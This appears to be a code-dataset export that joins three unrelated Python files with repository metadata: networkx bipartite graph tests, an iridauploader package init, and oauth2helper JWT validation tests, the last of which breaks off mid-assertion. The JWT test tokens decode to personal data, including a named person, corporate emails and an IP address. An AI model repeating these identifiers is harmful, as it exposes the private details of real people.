1132f2c813b79eff755bdd1a9e73e7ad3980af7c
|
[
"Apache-2.0"
] | null | null | null |
lib/python2.7/site-packages/networkx/algorithms/bipartite/tests/test_generators.py
|
nishaero/wifi-userseg-ryu
|
1132f2c813b79eff755bdd1a9e73e7ad3980af7c
|
[
"Apache-2.0"
] | 6
|
2018-04-12T15:49:27.000Z
|
2022-01-27T12:34:50.000Z
|
#!/usr/bin/env python
from nose.tools import *
from networkx import *
from networkx.algorithms.bipartite.generators import *
"""Generators - Bipartite
----------------------
"""
class TestGeneratorsBipartite():
def test_complete_bipartite_graph(self):
G=complete_bipartite_graph(0,0)
assert_true(is_isomorphic( G, null_graph() ))
for i in [1, 5]:
G=complete_bipartite_graph(i,0)
assert_true(is_isomorphic( G, empty_graph(i) ))
G=complete_bipartite_graph(0,i)
assert_true(is_isomorphic( G, empty_graph(i) ))
G=complete_bipartite_graph(2,2)
assert_true(is_isomorphic( G, cycle_graph(4) ))
G=complete_bipartite_graph(1,5)
assert_true(is_isomorphic( G, star_graph(5) ))
G=complete_bipartite_graph(5,1)
assert_true(is_isomorphic( G, star_graph(5) ))
# complete_bipartite_graph(m1,m2) is a connected graph with
# m1+m2 nodes and m1*m2 edges
for m1, m2 in [(5, 11), (7, 3)]:
G=complete_bipartite_graph(m1,m2)
assert_equal(number_of_nodes(G), m1 + m2)
assert_equal(number_of_edges(G), m1 * m2)
assert_raises(networkx.exception.NetworkXError,
complete_bipartite_graph, 7, 3, create_using=DiGraph())
mG=complete_bipartite_graph(7, 3, create_using=MultiGraph())
assert_equal(mG.edges(), G.edges())
def test_configuration_model(self):
aseq=[3,3,3,3]
bseq=[2,2,2,2,2]
assert_raises(networkx.exception.NetworkXError,
configuration_model, aseq, bseq)
aseq=[3,3,3,3]
bseq=[2,2,2,2,2,2]
G=configuration_model(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
aseq=[2,2,2,2,2,2]
bseq=[3,3,3,3]
G=configuration_model(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
aseq=[2,2,2,1,1,1]
bseq=[3,3,3]
G=configuration_model(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[1, 1, 1, 2, 2, 2, 3, 3, 3])
GU=project(Graph(G),range(len(aseq)))
assert_equal(GU.number_of_nodes(), 6)
GD=project(Graph(G),range(len(aseq),len(aseq)+len(bseq)))
assert_equal(GD.number_of_nodes(), 3)
assert_raises(networkx.exception.NetworkXError,
configuration_model, aseq, bseq,
create_using=DiGraph())
def test_havel_hakimi_graph(self):
aseq=[3,3,3,3]
bseq=[2,2,2,2,2]
assert_raises(networkx.exception.NetworkXError,
havel_hakimi_graph, aseq, bseq)
bseq=[2,2,2,2,2,2]
G=havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
aseq=[2,2,2,2,2,2]
bseq=[3,3,3,3]
G=havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
GU=project(Graph(G),range(len(aseq)))
assert_equal(GU.number_of_nodes(), 6)
GD=project(Graph(G),range(len(aseq),len(aseq)+len(bseq)))
assert_equal(GD.number_of_nodes(), 4)
assert_raises(networkx.exception.NetworkXError,
havel_hakimi_graph, aseq, bseq,
create_using=DiGraph())
def test_reverse_havel_hakimi_graph(self):
aseq=[3,3,3,3]
bseq=[2,2,2,2,2]
assert_raises(networkx.exception.NetworkXError,
reverse_havel_hakimi_graph, aseq, bseq)
bseq=[2,2,2,2,2,2]
G=reverse_havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
aseq=[2,2,2,2,2,2]
bseq=[3,3,3,3]
G=reverse_havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
aseq=[2,2,2,1,1,1]
bseq=[3,3,3]
G=reverse_havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[1, 1, 1, 2, 2, 2, 3, 3, 3])
GU=project(Graph(G),range(len(aseq)))
assert_equal(GU.number_of_nodes(), 6)
GD=project(Graph(G),range(len(aseq),len(aseq)+len(bseq)))
assert_equal(GD.number_of_nodes(), 3)
assert_raises(networkx.exception.NetworkXError,
reverse_havel_hakimi_graph, aseq, bseq,
create_using=DiGraph())
def test_alternating_havel_hakimi_graph(self):
aseq=[3,3,3,3]
bseq=[2,2,2,2,2]
assert_raises(networkx.exception.NetworkXError,
alternating_havel_hakimi_graph, aseq, bseq)
bseq=[2,2,2,2,2,2]
G=alternating_havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
aseq=[2,2,2,2,2,2]
bseq=[3,3,3,3]
G=alternating_havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
aseq=[2,2,2,1,1,1]
bseq=[3,3,3]
G=alternating_havel_hakimi_graph(aseq,bseq)
assert_equal(sorted(G.degree().values()),
[1, 1, 1, 2, 2, 2, 3, 3, 3])
GU=project(Graph(G),range(len(aseq)))
assert_equal(GU.number_of_nodes(), 6)
GD=project(Graph(G),range(len(aseq),len(aseq)+len(bseq)))
assert_equal(GD.number_of_nodes(), 3)
assert_raises(networkx.exception.NetworkXError,
alternating_havel_hakimi_graph, aseq, bseq,
create_using=DiGraph())
def test_preferential_attachment(self):
aseq=[3,2,1,1]
G=preferential_attachment_graph(aseq,0.5)
assert_raises(networkx.exception.NetworkXError,
preferential_attachment_graph, aseq, 0.5,
create_using=DiGraph())
def test_random_graph(self):
n=10
m=20
G=random_graph(n,m,0.9)
assert_equal(len(G),30)
assert_true(is_bipartite(G))
X,Y=nx.algorithms.bipartite.sets(G)
assert_equal(set(range(n)),X)
assert_equal(set(range(n,n+m)),Y)
def test_random_graph(self):
n=10
m=20
G=random_graph(n,m,0.9,directed=True)
assert_equal(len(G),30)
assert_true(is_bipartite(G))
X,Y=nx.algorithms.bipartite.sets(G)
assert_equal(set(range(n)),X)
assert_equal(set(range(n,n+m)),Y)
def test_gnmk_random_graph(self):
n = 10
m = 20
edges = 100
G = gnmk_random_graph(n, m, edges)
assert_equal(len(G),30)
assert_true(is_bipartite(G))
X,Y=nx.algorithms.bipartite.sets(G)
print(X)
assert_equal(set(range(n)),X)
assert_equal(set(range(n,n+m)),Y)
assert_equal(edges, len(G.edges()))
| 34.263158
| 77
| 0.559978
| 1,022
| 7,161
| 3.738748
| 0.090998
| 0.057053
| 0.064381
| 0.058623
| 0.866789
| 0.802669
| 0.766553
| 0.736195
| 0.71866
| 0.705051
| 0
| 0.062648
| 0.293395
| 7,161
| 208
| 78
| 34.427885
| 0.69249
| 0.014942
| 0
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.314815
| 1
| 0.055556
| false
| 0
| 0.018519
| 0
| 0.080247
| 0.006173
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c532e0d27da4e6220090f4869bde7412c6e0e585
| 233
|
py
|
Python
|
iridauploader/progress/__init__.py
|
dfornika/irida-uploader
|
0d855433bf5b567ff1e63501950fdc145b488742
|
[
"Apache-2.0"
] | null | null | null |
iridauploader/progress/__init__.py
|
dfornika/irida-uploader
|
0d855433bf5b567ff1e63501950fdc145b488742
|
[
"Apache-2.0"
] | null | null | null |
iridauploader/progress/__init__.py
|
dfornika/irida-uploader
|
0d855433bf5b567ff1e63501950fdc145b488742
|
[
"Apache-2.0"
] | null | null | null |
from iridauploader.progress.upload_status import get_directory_status, write_directory_status
from iridauploader.progress.upload_signals import signal_worker, send_progress, ProgressData
from iridauploader.progress import exceptions
| 58.25
| 93
| 0.901288
| 28
| 233
| 7.214286
| 0.535714
| 0.252475
| 0.371287
| 0.306931
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064378
| 233
| 3
| 94
| 77.666667
| 0.926606
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c562a80d4df9620e55a1f4a10a5e77efc0ba8a61
| 15,568
|
py
|
Python
|
tests/test_module.py
|
Colin-b/oauth2helper
|
52ddc1509a2fb7de2c662c4d6f8814f0cd9fea56
|
[
"MIT"
] | 1
|
2019-12-02T14:41:47.000Z
|
2019-12-02T14:41:47.000Z
|
tests/test_module.py
|
Colin-b/oauth2helper
|
52ddc1509a2fb7de2c662c4d6f8814f0cd9fea56
|
[
"MIT"
] | 1
|
2020-04-20T13:46:59.000Z
|
2020-04-20T13:46:59.000Z
|
tests/test_module.py
|
Colin-b/oauth2helper
|
52ddc1509a2fb7de2c662c4d6f8814f0cd9fea56
|
[
"MIT"
] | null | null | null |
import pytest
import jwt
from responses import RequestsMock
import oauth2helper
def test_token_cannot_be_decoded_if_not_provided():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.decode(None)
assert str(exception_info.value) == "JWT Token is mandatory."
def test_token_cannot_be_validated_if_not_provided():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.validate(None, "")
assert str(exception_info.value) == "JWT Token is mandatory."
def test_empty_token_cannot_be_decoded():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.decode("")
assert str(exception_info.value) == "JWT Token is mandatory."
def test_empty_token_cannot_be_validated():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.validate("", "")
assert str(exception_info.value) == "JWT Token is mandatory."
def test_invalid_token_cannot_be_decoded():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.decode("Invalid token")
assert (
str(exception_info.value)
== "Invalid JWT Token (header, body and signature must be separated by dots)."
)
def test_invalid_token_cannot_be_validated():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.validate("Invalid token", "")
assert (
str(exception_info.value)
== "Invalid JWT Token (header, body and signature must be separated by dots)."
)
def test_missing_upn():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.user_name({})
assert str(exception_info.value) == "No upn (i.e. User ID) in JSON body."
def test_validation_failure(responses: RequestsMock):
responses.add(
responses.GET,
"https://test_id_provider",
json={
"keys": [
{
"kid": "SSQdhI1cKvhQEDSJxE2gGYs40Q0",
"x5c": [
"MIIDBTCCAe2gAwIBAgIQdEMOjSqDVbdN3mzb2IumCzANBgkqhkiG9w0BAQsFADAtMSswKQYDVQQDEyJhY2NvdW50cy5hY2Nlc3Njb250cm9sLndpbmRvd3MubmV0MB4XDTE5MDYwNDAwMDAwMFoXDTIxMDYwNDAwMDAwMFowLTErMCkGA1UEAxMiYWNjb3VudHMuYWNjZXNzY29udHJvbC53aW5kb3dzLm5ldDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKEUUBvom99MdPXlrQ6S9MFmoQPoYI3NJVqEFOJcARY11dj3zyJogL8MTsTRt+DIJ8NyvYbgWC7K7zkAGzHQZhPJcM/AxSjFqh6qB98UqgxoSGBaG0A4lUZJHnKW3qx+YaiWrkg+z4sAwUkP0QgyI29Ejpkk6WUfe1rOJNc/defFUX+AVGxo81beLVAM/8tnCOSbF0H3IADwd76D/Hrp8RsGf4jPHr8N4VDsO/p7oj8rbOx0pL1ehjMK13zspmP8NO5mMcP9i5yiJ37FgbXESAxvja7I9t+y4LQYSu05M7la4Lqv//m5A8MBd6k0VxgF/Sq8GOIbkcQ0bJTCIN9B6oMCAwEAAaMhMB8wHQYDVR0OBBYEFNRP0Lf6MDeL11RDH0uL7H+/JqtLMA0GCSqGSIb3DQEBCwUAA4IBAQCJKR1nxp9Ij/yisCmDG7bdN1yHj/2HdVvyLfCCyReRfkB3cnTZVaIOBy5occGkdmsYJ+q8uqczkoCMAz3gvvq1c0msKEiNpqWNeU2aRXqyL3QZJ/GBmUK1I0tINPVv8j7znm0DcvHHXFvhzS8E4s8ai8vQkcpyac/7Z4PN43HtjDnkZo9Zxm7JahHshrhA8sSPvsuC4dQAcHbOrLbHG+HIo3Tq2pNl7mfQ9fVJ2FxbqlzPYr/rK8H2GTA6N55SuP3KTNvyL3RnMa3hXmGTdG1dpMFzD/IE623h/BqY6j29PyQC/+MUD4UCZ6KW9oIzpi27pKQagH1i1jpBU/ceH6AW"
],
}
]
},
)
expired = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IlNTUWRoSTFjS3ZoUUVEU0p4RTJnR1lzNDBRMCIsImtpZCI6IlNTUWRoSTFjS3ZoUUVEU0p4RTJnR1lzNDBRMCJ9.eyJhdWQiOiIyYmVmNzMzZC03NWJlLTQxNTktYjI4MC02NzJlMDU0OTM4YzMiLCJpc3MiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC8yNDEzOWQxNC1jNjJjLTRjNDctOGJkZC1jZTcxZWExZDUwY2YvIiwiaWF0IjoxNTIwMjcwNTAxLCJuYmYiOjE1MjAyNzA1MDEsImV4cCI6MTUyMDI3NDQwMSwiYWlvIjoiWTJOZ1lFaHlXMjYwVS9kR1RGeWNTMWNPVnczYnpqVXQ0Zk96TkNTekJYaWMyWTVOWFFNQSIsImFtciI6WyJwd2QiXSwiZmFtaWx5X25hbWUiOiJCb3Vub3VhciIsImdpdmVuX25hbWUiOiJDb2xpbiIsImlwYWRkciI6IjE5NC4yOS45OC4xNDQiLCJuYW1lIjoiQm91bm91YXIgQ29saW4gKEVOR0lFIEVuZXJneSBNYW5hZ2VtZW50KSIsIm5vbmNlIjoiW1x1MDAyNzczNjJDQUVBLTlDQTUtNEI0My05QkEzLTM0RDdDMzAzRUJBN1x1MDAyN10iLCJvaWQiOiJkZTZiOGVjYS01ZTEzLTRhZTEtODcyMS1mZGNmNmI0YTljZGQiLCJvbnByZW1fc2lkIjoiUy0xLTUtMjEtMTQwOTA4MjIzMy0xNDE3MDAxMzMzLTY4MjAwMzMzMC0zNzY5NTQiLCJzdWIiOiI2eEZSV1FBaElOZ0I4Vy10MnJRVUJzcElGc1VyUXQ0UUZ1V1VkSmRxWFdnIiwidGlkIjoiMjQxMzlkMTQtYzYyYy00YzQ3LThiZGQtY2U3MWVhMWQ1MGNmIiwidW5pcXVlX25hbWUiOiJKUzUzOTFAZW5naWUuY29tIiwidXBuIjoiSlM1MzkxQGVuZ2llLmNvbSIsInV0aSI6InVmM0x0X1Q5aWsyc0hGQ01oNklhQUEiLCJ2ZXIiOiIxLjAifQ.addwLSoO-2t1kXgljqnaU-P1hQGHQBiJMcNCLwELhBZT_vHvkZHFrmgfcTzED_AMdB9mTpvUm_Mk0d3F3RzLtyCeAApOPJaRAwccAc3PB1pKTwjFhdzIXtxib0_MQ6_F1fhb8R8ZcLCbwhMtT8nXoeWJOvH9_71O_vkfOn6E-VwLo17jkvQJOa89KfctGNnHNMcPBBju0oIgp_UVal311SMUw_10i4GZZkjR2I1m7EMg5jMwQgUatYWv2J5HoefAQQDat9jJeEnYNITxsJMN81FHTyuvMnN_ulFzOGtcvlBpmP6jVHfEDoJiqFM4NFh6r4IlOs2U2-jUb_bR5xi2zg"
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.validate(expired, "https://test_id_provider")
assert str(exception_info.value) == "Signature verification failed"
def test_validation_success_without_signature_check(responses: RequestsMock):
responses.add(
responses.GET,
"https://test_id_provider",
json={
"keys": [
{
"kid": "SSQdhI1cKvhQEDSJxE2gGYs40Q0",
"x5c": [
"MIIDBTCCAe2gAwIBAgIQdEMOjSqDVbdN3mzb2IumCzANBgkqhkiG9w0BAQsFADAtMSswKQYDVQQDEyJhY2NvdW50cy5hY2Nlc3Njb250cm9sLndpbmRvd3MubmV0MB4XDTE5MDYwNDAwMDAwMFoXDTIxMDYwNDAwMDAwMFowLTErMCkGA1UEAxMiYWNjb3VudHMuYWNjZXNzY29udHJvbC53aW5kb3dzLm5ldDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKEUUBvom99MdPXlrQ6S9MFmoQPoYI3NJVqEFOJcARY11dj3zyJogL8MTsTRt+DIJ8NyvYbgWC7K7zkAGzHQZhPJcM/AxSjFqh6qB98UqgxoSGBaG0A4lUZJHnKW3qx+YaiWrkg+z4sAwUkP0QgyI29Ejpkk6WUfe1rOJNc/defFUX+AVGxo81beLVAM/8tnCOSbF0H3IADwd76D/Hrp8RsGf4jPHr8N4VDsO/p7oj8rbOx0pL1ehjMK13zspmP8NO5mMcP9i5yiJ37FgbXESAxvja7I9t+y4LQYSu05M7la4Lqv//m5A8MBd6k0VxgF/Sq8GOIbkcQ0bJTCIN9B6oMCAwEAAaMhMB8wHQYDVR0OBBYEFNRP0Lf6MDeL11RDH0uL7H+/JqtLMA0GCSqGSIb3DQEBCwUAA4IBAQCJKR1nxp9Ij/yisCmDG7bdN1yHj/2HdVvyLfCCyReRfkB3cnTZVaIOBy5occGkdmsYJ+q8uqczkoCMAz3gvvq1c0msKEiNpqWNeU2aRXqyL3QZJ/GBmUK1I0tINPVv8j7znm0DcvHHXFvhzS8E4s8ai8vQkcpyac/7Z4PN43HtjDnkZo9Zxm7JahHshrhA8sSPvsuC4dQAcHbOrLbHG+HIo3Tq2pNl7mfQ9fVJ2FxbqlzPYr/rK8H2GTA6N55SuP3KTNvyL3RnMa3hXmGTdG1dpMFzD/IE623h/BqY6j29PyQC/+MUD4UCZ6KW9oIzpi27pKQagH1i1jpBU/ceH6AW"
],
}
]
},
)
expired = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IlNTUWRoSTFjS3ZoUUVEU0p4RTJnR1lzNDBRMCIsImtpZCI6IlNTUWRoSTFjS3ZoUUVEU0p4RTJnR1lzNDBRMCJ9.eyJhdWQiOiIyYmVmNzMzZC03NWJlLTQxNTktYjI4MC02NzJlMDU0OTM4YzMiLCJpc3MiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC8yNDEzOWQxNC1jNjJjLTRjNDctOGJkZC1jZTcxZWExZDUwY2YvIiwiaWF0IjoxNTIwMjcwNTAxLCJuYmYiOjE1MjAyNzA1MDEsImV4cCI6MTUyMDI3NDQwMSwiYWlvIjoiWTJOZ1lFaHlXMjYwVS9kR1RGeWNTMWNPVnczYnpqVXQ0Zk96TkNTekJYaWMyWTVOWFFNQSIsImFtciI6WyJwd2QiXSwiZmFtaWx5X25hbWUiOiJCb3Vub3VhciIsImdpdmVuX25hbWUiOiJDb2xpbiIsImlwYWRkciI6IjE5NC4yOS45OC4xNDQiLCJuYW1lIjoiQm91bm91YXIgQ29saW4gKEVOR0lFIEVuZXJneSBNYW5hZ2VtZW50KSIsIm5vbmNlIjoiW1x1MDAyNzczNjJDQUVBLTlDQTUtNEI0My05QkEzLTM0RDdDMzAzRUJBN1x1MDAyN10iLCJvaWQiOiJkZTZiOGVjYS01ZTEzLTRhZTEtODcyMS1mZGNmNmI0YTljZGQiLCJvbnByZW1fc2lkIjoiUy0xLTUtMjEtMTQwOTA4MjIzMy0xNDE3MDAxMzMzLTY4MjAwMzMzMC0zNzY5NTQiLCJzdWIiOiI2eEZSV1FBaElOZ0I4Vy10MnJRVUJzcElGc1VyUXQ0UUZ1V1VkSmRxWFdnIiwidGlkIjoiMjQxMzlkMTQtYzYyYy00YzQ3LThiZGQtY2U3MWVhMWQ1MGNmIiwidW5pcXVlX25hbWUiOiJKUzUzOTFAZW5naWUuY29tIiwidXBuIjoiSlM1MzkxQGVuZ2llLmNvbSIsInV0aSI6InVmM0x0X1Q5aWsyc0hGQ01oNklhQUEiLCJ2ZXIiOiIxLjAifQ.addwLSoO-2t1kXgljqnaU-P1hQGHQBiJMcNCLwELhBZT_vHvkZHFrmgfcTzED_AMdB9mTpvUm_Mk0d3F3RzLtyCeAApOPJaRAwccAc3PB1pKTwjFhdzIXtxib0_MQ6_F1fhb8R8ZcLCbwhMtT8nXoeWJOvH9_71O_vkfOn6E-VwLo17jkvQJOa89KfctGNnHNMcPBBju0oIgp_UVal311SMUw_10i4GZZkjR2I1m7EMg5jMwQgUatYWv2J5HoefAQQDat9jJeEnYNITxsJMN81FHTyuvMnN_ulFzOGtcvlBpmP6jVHfEDoJiqFM4NFh6r4IlOs2U2-jUb_bR5xi2zg"
json_header, json_body = oauth2helper.validate(
expired,
"https://test_id_provider",
verify_signature=False,
verify_exp=False,
algorithms=["RS256"],
)
assert json_header == {
"alg": "RS256",
"kid": "SSQdhI1cKvhQEDSJxE2gGYs40Q0",
"typ": "JWT",
"x5t": "SSQdhI1cKvhQEDSJxE2gGYs40Q0",
}
assert json_body == {
"aio": "Y2NgYEhyW260U/dGTFycS1cOVw3bzjUt4fOzNCSzBXic2Y5NXQMA",
"amr": ["pwd"],
"aud": "2bef733d-75be-4159-b280-672e054938c3",
"exp": 1520274401,
"family_name": "Bounouar",
"given_name": "Colin",
"iat": 1520270501,
"ipaddr": "194.29.98.144",
"iss": "https://sts.windows.net/24139d14-c62c-4c47-8bdd-ce71ea1d50cf/",
"name": "Bounouar Colin (ENGIE Energy Management)",
"nbf": 1520270501,
"nonce": "['7362CAEA-9CA5-4B43-9BA3-34D7C303EBA7']",
"oid": "de6b8eca-5e13-4ae1-8721-fdcf6b4a9cdd",
"onprem_sid": "S-1-5-21-1409082233-1417001333-682003330-376954",
"sub": "6xFRWQAhINgB8W-t2rQUBspIFsUrQt4QFuWUdJdqXWg",
"tid": "24139d14-c62c-4c47-8bdd-ce71ea1d50cf",
"unique_name": "JS5391@engie.com",
"upn": "JS5391@engie.com",
"uti": "uf3Lt_T9ik2sHFCMh6IaAA",
"ver": "1.0",
}
def test_content_extraction():
json_body = {"name": "Test name", "upn": "user@email"}
assert oauth2helper.user_name(json_body) == "user"
assert "Test name" == oauth2helper.get(json_body, "name")
def test_content_extraction_missing_key():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.get({}, "qsdfqsdfqsdf")
assert "No qsdfqsdfqsdf in JSON body." == str(exception_info.value)
def test_invalid_kid(responses: RequestsMock):
responses.add(
responses.GET,
"https://test_id_provider",
json={
"keys": [
{
"kid": "u4OfNFPHwEBosHjtrauObV84LnY",
"x5c": [
"MIIDBTCCAe2gAwIBAgIQdEMOjSqDVbdN3mzb2IumCzANBgkqhkiG9w0BAQsFADAtMSswKQYDVQQDEyJhY2NvdW50cy5hY2Nlc3Njb250cm9sLndpbmRvd3MubmV0MB4XDTE5MDYwNDAwMDAwMFoXDTIxMDYwNDAwMDAwMFowLTErMCkGA1UEAxMiYWNjb3VudHMuYWNjZXNzY29udHJvbC53aW5kb3dzLm5ldDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKEUUBvom99MdPXlrQ6S9MFmoQPoYI3NJVqEFOJcARY11dj3zyJogL8MTsTRt+DIJ8NyvYbgWC7K7zkAGzHQZhPJcM/AxSjFqh6qB98UqgxoSGBaG0A4lUZJHnKW3qx+YaiWrkg+z4sAwUkP0QgyI29Ejpkk6WUfe1rOJNc/defFUX+AVGxo81beLVAM/8tnCOSbF0H3IADwd76D/Hrp8RsGf4jPHr8N4VDsO/p7oj8rbOx0pL1ehjMK13zspmP8NO5mMcP9i5yiJ37FgbXESAxvja7I9t+y4LQYSu05M7la4Lqv//m5A8MBd6k0VxgF/Sq8GOIbkcQ0bJTCIN9B6oMCAwEAAaMhMB8wHQYDVR0OBBYEFNRP0Lf6MDeL11RDH0uL7H+/JqtLMA0GCSqGSIb3DQEBCwUAA4IBAQCJKR1nxp9Ij/yisCmDG7bdN1yHj/2HdVvyLfCCyReRfkB3cnTZVaIOBy5occGkdmsYJ+q8uqczkoCMAz3gvvq1c0msKEiNpqWNeU2aRXqyL3QZJ/GBmUK1I0tINPVv8j7znm0DcvHHXFvhzS8E4s8ai8vQkcpyac/7Z4PN43HtjDnkZo9Zxm7JahHshrhA8sSPvsuC4dQAcHbOrLbHG+HIo3Tq2pNl7mfQ9fVJ2FxbqlzPYr/rK8H2GTA6N55SuP3KTNvyL3RnMa3hXmGTdG1dpMFzD/IE623h/BqY6j29PyQC/+MUD4UCZ6KW9oIzpi27pKQagH1i1jpBU/ceH6AW"
],
},
{
"kid": "u4OfNFPHwEBosHjtrauObV84LnG",
"x5c": [
"MIIDBTCCAe2gAwIBAgIQdEMOjSqDVbdN3mzb2IumCzANBgkqhkiG9w0BAQsFADAtMSswKQYDVQQDEyJhY2NvdW50cy5hY2Nlc3Njb250cm9sLndpbmRvd3MubmV0MB4XDTE5MDYwNDAwMDAwMFoXDTIxMDYwNDAwMDAwMFowLTErMCkGA1UEAxMiYWNjb3VudHMuYWNjZXNzY29udHJvbC53aW5kb3dzLm5ldDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKEUUBvom99MdPXlrQ6S9MFmoQPoYI3NJVqEFOJcARY11dj3zyJogL8MTsTRt+DIJ8NyvYbgWC7K7zkAGzHQZhPJcM/AxSjFqh6qB98UqgxoSGBaG0A4lUZJHnKW3qx+YaiWrkg+z4sAwUkP0QgyI29Ejpkk6WUfe1rOJNc/defFUX+AVGxo81beLVAM/8tnCOSbF0H3IADwd76D/Hrp8RsGf4jPHr8N4VDsO/p7oj8rbOx0pL1ehjMK13zspmP8NO5mMcP9i5yiJ37FgbXESAxvja7I9t+y4LQYSu05M7la4Lqv//m5A8MBd6k0VxgF/Sq8GOIbkcQ0bJTCIN9B6oMCAwEAAaMhMB8wHQYDVR0OBBYEFNRP0Lf6MDeL11RDH0uL7H+/JqtLMA0GCSqGSIb3DQEBCwUAA4IBAQCJKR1nxp9Ij/yisCmDG7bdN1yHj/2HdVvyLfCCyReRfkB3cnTZVaIOBy5occGkdmsYJ+q8uqczkoCMAz3gvvq1c0msKEiNpqWNeU2aRXqyL3QZJ/GBmUK1I0tINPVv8j7znm0DcvHHXFvhzS8E4s8ai8vQkcpyac/7Z4PN43HtjDnkZo9Zxm7JahHshrhA8sSPvsuC4dQAcHbOrLbHG+HIo3Tq2pNl7mfQ9fVJ2FxbqlzPYr/rK8H2GTA6N55SuP3KTNvyL3RnMa3hXmGTdG1dpMFzD/IE623h/BqY6j29PyQC/+MUD4UCZ6KW9oIzpi27pKQagH1i1jpBU/ceH6AW"
],
},
]
},
)
expired = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImEzUU4wQlpTN3M0bk4tQmRyamJGMFlfTGRNTSIsImtpZCI6ImEzUU4wQlpTN3M0bk4tQmRyamJGMFlfTGRNTSJ9.eyJhdWQiOiIyYmVmNzMzZC03NWJlLTQxNTktYjI4MC02NzJlMDU0OTM4YzMiLCJpc3MiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC8yNDEzOWQxNC1jNjJjLTRjNDctOGJkZC1jZTcxZWExZDUwY2YvIiwiaWF0IjoxNDkwNzc5NzEyLCJuYmYiOjE0OTA3Nzk3MTIsImV4cCI6MTQ5MDc4MzYxMiwiYW1yIjpbInB3ZCJdLCJmYW1pbHlfbmFtZSI6IkRlIE1hZXllciIsImdpdmVuX25hbWUiOiJGYWJyaWNlIiwiaXBhZGRyIjoiMTA0LjQ2LjU4LjE0OSIsIm5hbWUiOiJEZSBNYWV5ZXIgRmFicmljZSAoZXh0ZXJuYWwpIiwibm9uY2UiOiI3MzYyQ0FFQS05Q0E1LTRCNDMtOUJBMy0zNEQ3QzMwM0VCQTciLCJvaWQiOiI1YTJmOGQyYS0xNzQ1LTRmNTctOTcwYS03YjIwMzU5YWUyZGMiLCJvbnByZW1fc2lkIjoiUy0xLTUtMjEtMTQwOTA4MjIzMy0xNDE3MDAxMzMzLTY4MjAwMzMzMC0yODUxNjAiLCJwbGF0ZiI6IjMiLCJzdWIiOiJRcjhNZlAwQk9oRld3WlNoNFZSVEpYeGd3Z19XTFBId193TnBnS1lMQTJVIiwidGlkIjoiMjQxMzlkMTQtYzYyYy00YzQ3LThiZGQtY2U3MWVhMWQ1MGNmIiwidW5pcXVlX25hbWUiOiJCSUY1OTBAZW5naWUuY29tIiwidXBuIjoiQklGNTkwQGVuZ2llLmNvbSIsInZlciI6IjEuMCJ9.vZO7a5Vs0G_g92Bb00BPKcLuF9WmrqfLjwbLhz8xEe3OfqfthWHqh_jzf_Md88INc4ZuMqOMPhWZTZjQMgCACIpTiHDpFRkokZ-jqC09BaQSSjwV_27b-zy-m6CZcFtdUe10LIBQEqiL9JnZlVIrBgFqr49bKBvZKr3uuaoeiuR2XcC0U2klYkDr3CYIexX0w57lvD5Ow0xKkdWKYVswcJipenU9PP63R0wNXr-8cb-6PGIUzaQDREo-EuR2e3uShF9u5cagG7emt9fDmJr8eGxBJU9ppRoffJpuaYeJiIg1F_n0iK7hENnIjZVnHjFn46DZO-RPse8YZjd4YBuKsg"
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.validate(expired, "https://test_id_provider")
assert (
